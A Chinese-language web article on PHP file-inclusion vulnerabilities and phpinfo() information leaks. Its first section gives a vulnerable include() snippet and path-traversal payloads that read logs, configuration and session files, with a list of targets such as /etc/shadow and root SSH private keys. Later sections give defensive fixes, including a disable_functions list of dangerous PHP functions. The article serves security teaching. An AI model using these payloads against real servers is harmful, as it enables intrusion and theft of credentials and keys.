本文目錄一覽:
- 1、php文件包含漏洞可能造成的危害有哪些
- 2、怎樣解決phpinfo()函數信息泄漏
- 3、發現phpinfo信息泄露漏洞 要怎麼處理
- 4、文件包含漏洞形成的原因是什麼
- 5、如何查找php文件包含漏洞的方法
php文件包含漏洞可能造成的危害有哪些
在接下來的內容中會以代碼樣本作為例子,來給大家介紹各種奇葩猥瑣的利用姿勢。
0x01 普通本地文件包含
1
?php
include(“inc/”
. $_GET[‘file’]);
?
包含同目錄下的文件:
?file=.htaccess
目錄遍歷:
?file=../../../../../../../../../var/lib/locate.db ?file=../../../../../../../../../var/lib/mlocate/mlocate.db
(Linux中這兩個文件儲存着所有文件的路徑,需要root權限)
包含錯誤日誌: ?file=../../../../../../../../../var/log/apache/error.log (試試把UA設置為「」來使payload進入日誌)
獲取web目錄或者其他配置文件:
?file=../../../../../../../../../usr/local/apache2/conf/httpd.conf
(更多→)
包含上傳的附件:
?file=../attachment/media/xxx.file
讀取session文件:
?file=../../../../../../tmp/sess_tnrdo9ub2tsdurntv0pdir1no7
(session文件一般在/tmp目錄下,格式為sess_[your phpsessid value],有時候也有可能在/var/lib/php5之類的,在此之前建議先讀取配置文件。在某些特定的情況下如果你能夠控制session的值,也許你能夠獲得一個shell)
如果擁有root權限還可以試試讀這些東西:
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_rsa.keystore
/root/.ssh/id_rsa.pub
/root/.ssh/known_hosts
/etc/shadow
/root/.bash_history
/root/.mysql_history
/proc/self/fd/fd[0-9]* (文件標識符)
/proc/mounts
/proc/config.gz
如果有phpinfo可以包含臨時文件:
參見
怎樣解決phpinfo()函數信息泄漏
phpinfo()函數返回的信息中包含了服務器的配置信息,包括:1)PHP編譯選項以及文件擴展名的相關信息;2)php的版本信息 3)php的配置信息;4)數據庫信息;等敏感信息。這些敏感信息會幫助攻擊者展開進一步的攻擊。
這一般是由於目標站點安裝了缺省腳本或者測試文件中調用了phpinfo()函數造成的。
限制此類腳本的訪問權限或者刪除對phpinfo()函數的調用
發現phpinfo信息泄露漏洞 要怎麼處理
(1)通過修改服務器環境內php.ini文件,將「expose_php = On」修改成「expose_php = Off」然後重啟php即可。
(2)如果確實需要該測試信息,在測試時使用,測試完畢後將該文件刪除掉。
(3)若無需要可以將一些php的危險函數禁用,打開/etc/php.ini文件,查找到 disable_functions,添加需禁用的以下函數名:
phpinfo,eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,
proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,
symlink,popepassthru,stream_socket_server,fsocket,fsockopen
文件包含漏洞形成的原因是什麼
導致系統漏洞的原因包括程序邏輯結構設計不合理,不嚴謹、編程人員程序設計錯誤以及目前為止硬件無法解決特定的問題:
1、編程人員在設計程序時,對程序邏輯結構設計不合理,不嚴謹,因此產生一處或者多處漏洞,正是由於這些漏洞,給病毒入侵用戶電腦提供了入口。
2、編程人員的程序設計錯誤也是計算機系統漏洞產生的原因之一,受編程人員的能力、經驗和當時安全技術所限,在程序中難免會有不足之處,輕則影響程序效率,重則導致非授權用戶的權限提升,這種類型的漏洞最典型的是緩衝區溢出漏洞,它也是被黑客利用得最多的一種類型的漏洞。
3、由於目前硬件無法解決特定的問題,使編程人員只得通過軟件設計來表現出硬件功能而產生的漏洞,也會讓黑客長驅直入,攻擊用戶的電腦。
擴展資料:
漏洞的影響範圍很廣,包括系統本身及其支持軟件、網絡客戶端和服務器軟件、網絡路由器和安全防火牆。
在不同類型的硬件和軟件設備、相同設備的不同版本、不同的系統由不同的設備組成,以及同一系統在不同的設置下,都會存在不同的安全漏洞。
因此,隨着時間的推移,舊的系統漏洞會消失,新的系統漏洞會繼續出現。系統中的漏洞也依然存在。
如何查找php文件包含漏洞的方法
找360或安全聯盟檢測接口, 免費的。
主要是查上傳漏洞。可以百度下,夠學習一段時間的。
原創文章,作者:FJQDC,如若轉載,請註明出處:https://www.506064.com/zh-hk/n/325353.html
微信掃一掃 
支付寶掃一掃 